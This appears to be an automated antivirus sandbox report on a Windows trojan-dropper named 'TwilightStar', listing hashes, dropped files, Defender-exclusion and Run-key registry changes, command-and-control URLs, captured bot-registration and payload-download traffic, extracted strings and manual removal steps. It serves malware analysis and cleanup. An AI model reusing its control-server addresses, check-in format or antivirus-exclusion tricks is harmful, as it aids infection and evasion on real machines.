MD5: abc8d5cf58cba5cc542613963932956d
SHA1: d5affaffd1450bfcc3ad16dea09d8dd918fbaba9
SHA256: b23680597ae27d1287fd303bb89a689f439d799e684be018474e517bc611745d
SSDeep: 98304:4HiT8Gn22jG3iaKAjJKlEE2AQGJVMvNAU7R1C:4HiYGfGS32JVEpPyaUdY
Size: 4590592 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 1970-01-01 03:00:00
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan-Dropper creates the following process(es):

netsh.exe:3804
netsh.exe:532
%original file name%.exe:2936
%original file name%.exe:1084
CompMgmtLauncher.exe:4064
windefender.exe:3892
windefender.exe:4004

The Trojan-Dropper injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2936 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Windows\rss\csrss.exe (72080 bytes)

The process CompMgmtLauncher.exe:4064 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\csrss\windefender.exe (730 bytes)

The process windefender.exe:4004 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Windows\windefender.exe (52533 bytes)

Registry activity

The process netsh.exe:3804 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"napipsec.dll,-4" = "1.0"
"eapqec.dll,-100" = "EAP Quarantine Enforcement Client"
"tsgqec.dll,-103" = "Microsoft Corporation"
"napipsec.dll,-1" = "IPsec Relying Party"
"napipsec.dll,-2" = "Provides IPsec based enforcement for Network Access Protection"
"napipsec.dll,-3" = "Microsoft Corporation"
"eapqec.dll,-103" = "Microsoft Corporation"
"tsgqec.dll,-100" = "RD Gateway Quarantine Enforcement Client"

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"dhcpqec.dll,-101" = "Provides DHCP based enforcement for NAP"
"dhcpqec.dll,-100" = "DHCP Quarantine Enforcement Client"
"dhcpqec.dll,-103" = "1.0"
"dhcpqec.dll,-102" = "Microsoft Corporation"
"tsgqec.dll,-101" = "Provides RD Gateway enforcement for NAP"
"eapqec.dll,-101" = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."
"eapqec.dll,-102" = "1.0"
"tsgqec.dll,-102" = "1.0"

The process netsh.exe:532 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process %original file name%.exe:2936 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"Windefender.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Temp]
"csrss" = "0"

[HKCU\Software\Microsoft\TestApp]
"Defender" = "1"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"csrss.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Roaming\EpicNet Inc]
"cloudnet" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows]
"RSS" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Roaming]
"TwilightStar" = "0"

[HKCU\Software\Microsoft\TestApp]
"Firewall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"cloudnet.exe" = "0"

To automatically run itself each time Windows is booted, the Trojan-Dropper adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"TwilightStar" = "C:\Windows\rss\csrss.exe"

The process %original file name%.exe:1084 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\TestApp]
"osArchitecture" = "32"
"PatchTime" = "Type: REG_QWORD, Length: 8"
"OSCaption" = "Microsoft Windows 7 Ultimate"
"FirstInstallDate" = "Type: REG_QWORD, Length: 8"
"uuid" = ""
"AV" = ""
"Defender" = ""
"IsAdmin" = "1"
"Server" = "http://rentahouseanton.com"
"CloudnetSource" = ""
"Name" = "TwilightStar"
"cpu" = "Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz"
"InstallCloudnet" = "1"
"ServiceVersion" = ""
"Firewall" = ""
"GPU" = "VMware SVGA 3D (Microsoft Corporation - WDDM)"
"Command" = "Type: REG_QWORD, Length: 8"

The process CompMgmtLauncher.exe:4064 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"mycomput.dll,-112" = "Manages disks and provides access to other tools to manage local and remote computers."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process windefender.exe:3892 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\TestApp]
"ServiceVersion" = "0.4"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://rentahouseanton.com/bots/install-failure	85.114.141.81
hxxp://rentahouseanton.com/bots/register	85.114.141.81
hxxp://rentahouseanton.com/n/watchdog.exe	85.114.141.81
hxxp://readlenta.ru/n/watchdog.exe	85.114.141.81

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /bots/register HTTP/1.1

Host: rentahouseanton.com

User-Agent: Go-http-client/1.1

Content-Length: 417

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

Data[appname]=TwilightStar&Data[arch]=32&Data[av]=&Data[build_number]=7601&Data[compaign_id]=&Data[cpu]=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Data[defender]=1&Data[exploited]=1&Data[firewall]=1&Data[gpu]=VMware SVGA 3D (Microsoft Corporation - WDDM)&Data[is_admin]=1&Data[os]=Microsoft Windows 7 Ultimate &Data[username]=adm&Data[version]=0.2.16
HTTP/1.1 200 OK

Server: nginx/1.12.1

Date: Sun, 03 Sep 2017 18:32:26 GMT

Content-Type: application/json; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/7.1.8
2f..{"uuid":"a85355d5-8cc5-4af7-8449-5d0e90313cfc"}..0..HTTP/1.1 200 O
K..Server: nginx/1.12.1..Date: Sun, 03 Sep 2017 18:32:26 GMT..Content-
Type: application/json; charset=UTF-8..Transfer-Encoding: chunked..Con
nection: keep-alive..X-Powered-By: PHP/7.1.8..2f..{"uuid":"a85355d5-8c
c5-4af7-8449-5d0e90313cfc"}..0......

POST /bots/install-failure HTTP/1.1

Host: rentahouseanton.com

User-Agent: Go-http-client/1.1

Content-Length: 86

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

compaign_id=&reason=couldn't create a scheduled task: exit status 1&version=0.2.16
HTTP/1.1 200 OK

Server: nginx/1.12.1

Date: Sun, 03 Sep 2017 18:32:24 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/7.1.8

Content-Encoding: gzip
14........................0..HTTP/1.1 200 OK..Server: nginx/1.12.1..Da
te: Sun, 03 Sep 2017 18:32:24 GMT..Content-Type: text/html; charset=UT
F-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By:
 PHP/7.1.8..Content-Encoding: gzip..14........................0..

GET /n/watchdog.exe HTTP/1.1

Host: readlenta.ru

User-Agent: Go-http-client/1.1

Accept-Encoding: gzip

HTTP/1.1 200 OK

Server: nginx/1.12.1

Date: Sun, 03 Sep 2017 18:32:28 GMT

Content-Type: application/octet-stream

Content-Length: 3430912

Last-Modified: Fri, 01 Sep 2017 16:01:11 GMT

Connection: keep-alive

ETag: "59a98447-345a00"

Access-Control-Allow-Origin: *

Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L.......
.X4..............T1.........@........p1...@.......................... 
6...............................................6.r...................
.................................................................p1...
...........................text....S1......T1.................`..`.dat
a...(....p1......X1.............@....idata..r.....6......T4...........
..@....symtab.......6......X4................B........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................. Go build ID: "d8a49cf838
559141d160d19b01a6d03b018ffc4f". .....d............;a.vk....D$......D$
......D$.....$......D$...t......u..D$......D$..........D$..D$......$..
....D$..L$..L$..D$...........y............d............;a...........D$
..........D$.....$.-....D$...t......t..L$.9........D$..D$..D$......$..
.............D$...$.D$......D$............D$...u.........D$..D$..D$..H
...$......D$..D$..D$...$.{....V...........]...$..p.d..D$..jU........].
..$..h.d..D$..PU..................d............;a.v...............
<<< skipped >>>

POST /bots/install-failure HTTP/1.1

Host: rentahouseanton.com

User-Agent: Go-http-client/1.1

Content-Length: 86

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

compaign_id=&reason=couldn't create a scheduled task: exit status 1&version=0.2.16
HTTP/1.1 200 OK

Server: nginx/1.12.1

Date: Sun, 03 Sep 2017 18:32:26 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/7.1.8

Content-Encoding: gzip
14........................0..HTTP/1.1 200 OK..Server: nginx/1.12.1..Da
te: Sun, 03 Sep 2017 18:32:26 GMT..Content-Type: text/html; charset=UT
F-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By:
 PHP/7.1.8..Content-Encoding: gzip..14........................0..t>....

The Trojan-Dropper connects to the servers at the folowing location(s):

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

msvcrt.dll

ole32.dll

j.Yf;

Failed to execute shutdown processing.

FFailed a critical portion of startup processing.

Failed to initialize delayed portion.

TrustedInstaller terminated unexpectedly with pending operations the last time around; will skip core startup processing.

Failed to execute service.

Starting the Trusted Installer in standalone mode based on command-line switch: %S

Failed to expand path to servicing stack directory: %S

Failed to open servicing stack version registry key.

TI found cbscore.dll at: %S

Failed to initialize the DLL: %S

Failed to locate 'SfpInitialize' method in DLL: %S

Failed to load sfp DLL from path: %S

Failed to supply callback for revoking shutdown processing; assuming it is not supported.

Failed to initialize the Core DLL: %S

Warning: Failed to locate 'CbsCoreFinalizeShutdownProcessing' method in Core DLL: %S

Warning: Failed to locate 'CbsCorePrepareShutdownProcessing' method in Core DLL: %S

Warning: Failed to locate 'CbsCoreIsExecutionEngineIdle' method in Core DLL: %S

CbsCoreIsExecutionEngineIdle

Warning: Failed to locate 'CbsCoreUnregisterWinlogonNotification' method in Core DLL: %S

Warning: Failed to locate 'CbsCoreSetState' method in Core DLL: %S

Warning: Failed to locate 'CbsCoreServiceIdleProcessing' method in Core DLL: %S

Failed to locate 'CbsCoreFinalize' method in Core DLL: %S

Failed to locate 'CbsCoreShutdownProcessing' method in Core DLL: %S

Failed to locate 'CbsCoreEnsureNoStartupProcessing' method in Core DLL: %S

Failed to locate 'CbsCoreStartupProcessing' method in Core DLL: %S

Failed to locate 'CbsCoreInitializeDelayedPortion' method in Core DLL: %S

CbsCoreInitializeDelayedPortion

Failed to locate 'CbsCoreInitialize' method in Core DLL: %S

Failed to load Core DLL from path: %S

Failed to initialize sxsstore.dll

Failed to load SxsStore.dll

Failed to append dll name: %S to path: %S.

Failed to backslash-terminate system directory: %S.

May have successfully finished startup processing but another reboot and executing startup processing again is required to be sure.

Ignoring failure to set reboot callback; assuming reboot indication is not supported.

Failed to allocate string to format: %S

failed to allocate string to format: %S

Failed to get length of passed in string

Failed to get full path for string: %S

Failed to expand environment variables in string: %S

Failed to allocate string to enum registry value: %S

Registry value for %S is not a dword type.

%s [HRESULT = 0xx - %s]

Failed to open the registry root: n/a, key: %S.

Failed to query registry value: %S

Failed during startup processing, continuing with Trusted Installer execution

Warning: Failed to execute service idle processing. Error code: 0X%x

SSSh \

Startup: Failed to wait on startup thread. Wait result: 0x%x

Failed to wait on startup thread. Wait result: 0x%x

Failed to wait on idle processing thread. Wait result: 0x%x

Warning: Failed while executing service idle processing.

Failed while executing shutdown processing.

Failed to open RebootPending key.

Reboot mark refs incremented to: %u

RebootPending key exists unexpectedly.

Failed to create RebootPending key.

Reboot mark refs: %u

Failed to delete RebootPending key.

Failed to open TrustedInstaller service to change config, hopefully the auto-start registry key is already set.

Failed to change the Trusted Installer to an auto start service, hopefully the auto-start registry key is already set.

Failed to locate setup log directory while executing during setup. Probably not really running under setup.

d:\w7rtm\base\cbs\util\cbsutil.cpp

Failed to allocate delete search string for backup logs directory path: %S

Failed to wait on makecab.exe process.

Failed to delete backup log after archiving: %S.

Failed to transfer cab timestamp: %S.

Failed to open handle for cab timestamp transfer: %S.

Archived backup log: %S.

Failed to allocate full path to makecab.exe.

Failed to ensure makecab.exe path ended with a backslash: %S.

Failed to allocate makecab.exe path from windows directory: %S.

Failed to get windows directory for makecab.exe path.

Failed to get proc address for ConstructPartialMsgVA.

ConstructPartialMsgVA

Could not allocate a backup name for the log file: %S, we'll just continue with our current log file.

Failed to initialize logging with dll: %S, log directory: %S

Failed to move log: %S to backup log: %S, continuing anyway.

Failed to add log name log directory: %S

Failed to store log path argument: %S

Failed to ensure that logging directory exists: %S

Failed to add 'servicing' name on to log directory: %S

Failed to ensure log directory ended with a backslash: %S

Failed to allocate log directory from windows directory: %S

Failed to get windows directory for log file.

Failed to initialize logging with DLL: %S, log file: %S

Failed to allocate log file name: %S

Failed to get proc address for WdsGenericSetupLogInit.

WdsGenericSetupLogInit

Failed to get proc address for WdsSetupLogInit.

WdsSetupLogInit

Failed to load WDSCORE DLL: %S

Could not load WDSCORE DLL from path: %S. Continuing without text file logging.

Failed to ensure Wds path ended with a backslash: %S

Failed to allocate Wds path from windows directory: %S

Failed to get windows directory for WDSCORE DLL path.

Failed to get attributes for file: %S

Failed to create path: %S

Failed to copy parent of path: %S

Cannot find parent for path: %S.

Failed to allocate string to read registry value: %S

Failed to query value to get type and size of registry root: n/a, value: %S

Failed initial query of value to get type, size, and value of registry value: %S

Failed to look up privilege name: %S

CERT_E_INVALID_NAME

CERT_E_INVALID_POLICY

CERT_E_UNTRUSTEDCA

CERT_E_WRONG_USAGE

CERT_E_CN_NO_MATCH

CERT_E_REVOCATION_FAILURE

CERT_E_UNTRUSTEDTESTROOT

CERT_E_REVOKED

CERT_E_CHAINING

CERT_E_UNTRUSTEDROOT

CERT_E_PATHLENCONST

CERT_E_CRITICAL

CERT_E_PURPOSE

CERT_E_ISSUERCHAINING

CERT_E_MALFORMED

CERT_E_ROLE

CERT_E_EXPIRED

CERT_E_VALIDITYPERIODNESTING

CRYPT_E_MISSING_PUBKEY_PARA

CRYPT_E_BAD_MSG

CRYPT_E_NO_DECRYPT_CERT

CRYPT_E_NO_KEY_PROPERTY

CRYPT_E_UNEXPECTED_MSG_TYPE

CRYPT_E_STREAM_MSG_NOT_READY

CRYPT_E_INVALID_MSG_TYPE

CRYPT_E_MSG_ERROR

CBS_E_SQM_REPORT_IGNORED_AI_FAILURES_ON_TRANSACTION_RESOLVE

CBS_E_INVALID_DRIVER_OPERATION_KEY

SPAPI_E_REMOTE_REQUEST_UNSUPPORTED

SPAPI_E_NON_WINDOWS_DRIVER

SPAPI_E_NON_WINDOWS_NT_DRIVER

SPAPI_E_KEY_DOES_NOT_EXIST

!"#$%&'()* ,-./0

ERROR_MCA_UNSUPPORTED_COLOR_TEMPERATURE

ERROR_MCA_UNSUPPORTED_MCCS_VERSION

ERROR_EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL

ERROR_EVT_FILTER_UNSUPPORTEDOP

ERROR_SXS_INCORRECT_PUBLIC_KEY_TOKEN

ERROR_SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT

ERROR_SXS_KEY_NOT_FOUND

ERROR_IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH

ERROR_IPSEC_IKE_INVALID_CERT_KEYLEN

ERROR_IPSEC_IKE_UNSUPPORTED_ID

ERROR_IPSEC_IKE_ADD_UPDATE_KEY_FAILED

ERROR_IPSEC_IKE_NO_PEER_CERT

ERROR_IPSEC_IKE_PROCESS_ERR_CERT_REQ

ERROR_IPSEC_IKE_PROCESS_ERR_CERT

ERROR_IPSEC_IKE_NO_PUBLIC_KEY

ERROR_IPSEC_IKE_SIMULTANEOUS_REKEY

ERROR_IPSEC_IKE_NO_PRIVATE_KEY

ERROR_IPSEC_IKE_INVALID_CERT_TYPE

ERROR_IPSEC_IKE_INVALID_KEY_USAGE

ERROR_IPSEC_IKE_NO_CERT

ERROR_IPSEC_TRANSPORT_FILTER_PENDING_DELETION

ERROR_IPSEC_TRANSPORT_FILTER_NOT_FOUND

ERROR_IPSEC_TRANSPORT_FILTER_EXISTS

ERROR_NOT_SUPPORTED_ON_STANDARD_SERVER

ERROR_DS_NOT_SUPPORTED_SORT_ORDER

ERROR_DS_SAM_NEED_BOOTKEY_FLOPPY

ERROR_DS_SAM_NEED_BOOTKEY_PASSWORD

ERROR_DS_KEY_NOT_UNIQUE

ERROR_DS_ILLEGAL_XDOM_MOVE_OPERATION

ERROR_DS_PDC_OPERATION_IN_PROGRESS

ERROR_DS_DRA_NOT_SUPPORTED

ERROR_DS_UNKNOWN_OPERATION

ERROR_DS_ILLEGAL_MOD_OPERATION

ERROR_DS_NOT_SUPPORTED

ERROR_DS_AUTH_METHOD_NOT_SUPPORTED

ERROR_DS_OPERATIONS_ERROR

ERROR_OPERATION_NOT_SUPPORTED_IN_TRANSACTION

ERROR_CANNOT_EXECUTE_FILE_IN_TRANSACTION

ERROR_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE

ERROR_TRANSACTIONS_UNSUPPORTED_REMOTE

ERROR_IMPLICIT_TRANSACTION_NOT_SUPPORTED

ERROR_TRANSACTION_NOT_JOINED

ERROR_LOG_MULTIPLEXED

ERROR_CS_ENCRYPTION_UNSUPPORTED_SERVER

ERROR_EFS_VERSION_NOT_SUPPORT

ERROR_VOLUME_NOT_SUPPORT_EFS

ERROR_NOT_EXPORT_FORMAT

ERROR_NO_USER_KEYS

ERROR_CLUSTER_RESTYPE_NOT_SUPPORTED

ERROR_CLUSTER_JOIN_ABORTED

ERROR_INVALID_OPERATION_ON_QUORUM

ERROR_CLUSTER_JOIN_NOT_IN_PROGRESS

ERROR_CLUSTER_JOIN_IN_PROGRESS

ERROR_IEPORT_FULL

ERROR_NO_SUPPORTING_DRIVES

ERROR_CONTROLLING_IEPORT

ERROR_TRANSPORT_FULL

ERROR_UNABLE_TO_INVENTORY_TRANSPORT

ERROR_INVALID_OPERATION

RPC_S_INTERFACE_NOT_EXPORTED

RPC_S_NOT_ALL_OBJS_EXPORTED

RPC_X_PIPE_EMPTY

RPC_X_PIPE_DISCIPLINE_ERROR

RPC_X_PIPE_CLOSED

RPC_X_WRONG_PIPE_VERSION

RPC_X_WRONG_PIPE_ORDER

RPC_X_INVALID_PIPE_OBJECT

RPC_S_UNSUPPORTED_AUTHN_LEVEL

RPC_S_CANNOT_SUPPORT

RPC_S_NOT_ALL_OBJS_UNEXPORTED

RPC_S_NOTHING_TO_EXPORT

RPC_S_UNSUPPORTED_NAME_SYNTAX

RPC_S_UNSUPPORTED_TYPE

RPC_S_UNSUPPORTED_TRANS_SYN

RPC_S_PROTSEQ_NOT_SUPPORTED

ERROR_CONNECTED_OTHER_PASSWORD_DEFAULT

ERROR_CONNECTED_OTHER_PASSWORD

ERROR_CLIPPING_NOT_SUPPORTED

ERROR_TRANSFORM_NOT_SUPPORTED

ERROR_METAFILE_NOT_SUPPORTED

ERROR_PASSWORD_MUST_CHANGE

ERROR_UNKNOWN_PORT

ERROR_PATCH_REMOVAL_UNSUPPORTED

ERROR_PATCH_PACKAGE_UNSUPPORTED

ERROR_INSTALL_PLATFORM_UNSUPPORTED

ERROR_UNSUPPORTED_TYPE

ERROR_INSTALL_LANGUAGE_UNSUPPORTED

ERROR_SYMLINK_NOT_SUPPORTED

ERROR_REQUIRES_INTERACTIVE_WINDOWSTATION

ERROR_INVALID_KEYBOARD_HANDLE

ERROR_INVALID_MSGBOX_STYLE

ERROR_HOTKEY_NOT_REGISTERED

ERROR_CLASS_HAS_WINDOWS

ERROR_HOTKEY_ALREADY_REGISTERED

ERROR_NO_USER_SESSION_KEY

ERROR_PASSWORD_EXPIRED

ERROR_PASSWORD_RESTRICTION

ERROR_ILL_FORMED_PASSWORD

ERROR_WRONG_PASSWORD

ERROR_NULL_LM_PASSWORD

ERROR_LOCAL_USER_SESSION_KEY

ERROR_ACCESS_DISABLED_WEBBLADE_TAMPER

ERROR_ACCESS_DISABLED_WEBBLADE

ERROR_INVALID_IMPORT_OF_NON_DLL

ERROR_NOT_SUPPORTED_ON_SBS

ERROR_LOGIN_WKSTA_RESTRICTION

ERROR_LOGIN_TIME_RESTRICTION

ERROR_PORT_UNREACHABLE

ERROR_INVALID_PASSWORDNAME

ERROR_DISK_OPERATION_FAILED

ERROR_SERVICE_NOT_IN_EXE

ERROR_KEY_HAS_CHILDREN

ERROR_KEY_DELETED

ERROR_BADKEY

ERROR_OPERATION_ABORTED

ERROR_PRIMARY_TRANSPORT_CONNECT_FAILED

ERROR_CARDBUS_NOT_SUPPORTED

ERROR_IMAGE_MACHINE_TYPE_MISMATCH_EXE

ERROR_PORT_NOT_SET

ERROR_UNSUPPORTED_COMPRESSION

ERROR_PORT_MESSAGE_TOO_LONG

ERROR_INVALID_PORT_ATTRIBUTES

ERROR_PIPE_LISTENING

ERROR_PIPE_CONNECTED

ERROR_EAS_NOT_SUPPORTED

ERROR_PIPE_NOT_CONNECTED

ERROR_PIPE_BUSY

ERROR_BAD_PIPE

ERROR_PIPE_LOCAL

ERROR_EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY

ERROR_EXE_CANNOT_MODIFY_SIGNED_BINARY

ERROR_EXE_MACHINE_TYPE_MISMATCH

ERROR_BAD_EXE_FORMAT

ERROR_EXE_MARKED_INVALID

ERROR_INVALID_EXE_SIGNATURE

ERROR_ATOMIC_LOCKS_NOT_SUPPORTED

ERROR_IS_JOIN_PATH

ERROR_SUBST_TO_JOIN

ERROR_JOIN_TO_SUBST

ERROR_JOIN_TO_JOIN

ERROR_NOT_JOINED

ERROR_IS_JOINED

ERROR_IS_JOIN_TARGET

ERROR_BROKEN_PIPE

ERROR_INVALID_PASSWORD

ERROR_TOO_MANY_CMDS

ERROR_NOT_SUPPORTED

SL_E_VL_KEY_MANAGEMENT_SERVICE_VM_NOT_SUPPORTED

SL_E_OPERATION_NOT_ALLOWED

SL_E_SLP_OEM_CERT_MISSING

SL_E_PKEY_INVALID_UPGRADE

SL_E_BLOCKED_PRODUCT_KEY

SL_E_INVALID_PRODUCT_KEY

SL_E_VL_KEY_MANAGEMENT_SERVICE_ID_MISMATCH

SL_E_VL_KEY_MANAGEMENT_SERVICE_NOT_ACTIVATED

SL_E_VL_NOT_WINDOWS_SLP

SL_E_PRODUCT_KEY_INSTALLATION_NOT_ALLOWED

SL_E_CIDIID_VERSION_NOT_SUPPORTED

SL_E_PROXY_KEY_NOT_FOUND

SL_E_WINDOWS_INVALID_LICENSE_STATE

SL_E_LICENSE_SERVER_URL_NOT_FOUND

SL_E_NOT_SUPPORTED

SL_E_PKEY_NOT_INSTALLED

SL_E_INVALID_PKEY

SL_E_MISMATCHED_PKEY_RANGE

SL_E_PKEY_INVALID_KEYCHANGE2

SL_E_PKEY_INVALID_KEYCHANGE3

SL_E_PKEY_INVALID_KEYCHANGE4

SL_E_PKEY_INVALID_KEYCHANGE1

SL_E_PKEY_INTERNAL_ERROR

SL_E_PKEY_INVALID_ALGORITHM

SL_E_PKEY_INVALID_UNIQUEID

SL_E_PKEY_INVALID_CONFIG

SL_E_CHREF_PRODUCT_KEY_BINDING_MISMATCH

SL_E_CHREF_PRODUCT_KEY_POLICY_OVERLAPPED

SL_E_CHREF_INVALID_PRODUCT_KEY_UNIQUEID

SL_E_CHREF_PRODUCT_KEY_POLICY_MISSING

SL_E_CHREF_INVALID_PRODUCT_KEY_ALGORITHM

SL_E_CHPA_FAILED_TO_INSERT_PRODUCT_KEY_RECORD

SL_E_CHPA_FAILED_TO_UPDATE_PRODUCT_KEY_RECORD

SL_E_CHREF_INVALID_PRODUCT_KEY

SL_E_CHREF_EXCLUDED_PRODUCT_KEY

SL_E_CHREF_PRODUCT_KEY_REVOKED

SL_E_CHPA_PRODUCT_KEY_BEING_USED

SL_E_CHPA_FAILED_TO_DELETE_PRODUCTKEY_BINDING

SL_E_CHPA_FAILED_TO_PROCESS_PRODUCT_KEY_BINDINGS_XML

SL_E_CHPA_FAILED_TO_INSERT_PRODUCT_KEY_PROPERTY

SL_E_CHPA_FAILED_TO_UPDATE_PRODUCT_KEY_PROPERTY

SL_E_CHPA_FAILED_TO_DELETE_PRODUCT_KEY_PROPERTY

SL_E_CHPA_UNKNOWN_PRODUCT_KEY_TYPE

SL_E_CHPA_FAILED_TO_INSERT_PRODUCTKEY_BINDING

SL_E_CHPA_FAILED_TO_UPDATE_PRODUCTKEY_BINDING

SL_E_CHPA_TIMEBASED_PRODUCT_KEY_NOT_CONFIGURED

SL_E_CHPA_INVALID_PRODUCT_KEY_CHAR

SL_E_CHPA_INVALID_PRODUCT_KEY_FORMAT

SL_E_CHPA_INVALID_PRODUCT_KEY_LENGTH

SL_E_CHPA_UNSUPPORTED_PRODUCT_KEY

SL_E_CHPA_INVALID_PRODUCT_KEY

SL_E_CHPA_PRODUCT_KEY_BLOCKED

SL_E_CHPA_PRODUCT_KEY_OUT_OF_RANGE

SL_E_SRV_INVALID_PRODUCT_KEY_LICENSE

t.Ht!HHt

JET_wrnKeyChanged

JET_wrnUniqueKey

JET_errInvalidOperation

JET_errLanguageNotSupported

JET_errKeyDuplicate

JET_errKeyNotMade

JET_errKeyIsMade

JET_errColumnIndexed

JET_errIndexTuplesKeyTooSmall

JET_errTooManyOpenIndexes

JET_errIllegalOperation

JET_errNullKeyDisallowed

JET_errLinkNotSupported

JET_errTooManyKeys

JET_errTooManyIndexes

JET_errUnicodeNormalizationNotSupported

JET_errSectorSizeNotSupported

JET_errInvalidLoggedOperation

JET_errKeyTooBig

JET_errKeyTruncated

JET_errKeyBoundary

RegCloseKey

RegOpenKeyExW

RegOpenKeyW

RegCreateKeyExW

RegDeleteKeyW

GetWindowsDirectoryW

_amsg_exit

TrustedInstaller.pdb

9$9*979_9

=!=&= =4=

SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Version

\cbscore.dll

0.0.0.1

\wrpint.dll

Software\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending

%s\%s

.WorkingDirectory

\CbsPersist_*.*

"%s" %s %s

\CbsPersist_*.log

makecab.exe

%s\CbsPersist_dddddd.log

\CBS.log

SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing

wdscore.dll

SxsStore.dll

Windows Modules Installer

6.1.7601.17514 (win7sp1_rtm.101119-1850)

TrustedInstaller.exe

Windows

Operating System

6.1.7601.17514

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   netsh.exe:3804
   netsh.exe:532
   %original file name%.exe:2936
   %original file name%.exe:1084
   CompMgmtLauncher.exe:4064
   windefender.exe:3892
   windefender.exe:4004
   

2. Delete the original Trojan-Dropper file.
   
3. Delete or disinfect the following files created/modified by the Trojan-Dropper:
   

   C:\Windows\rss\csrss.exe (72080 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\csrss\windefender.exe (730 bytes)
   C:\Windows\windefender.exe (52533 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "TwilightStar" = "C:\Windows\rss\csrss.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.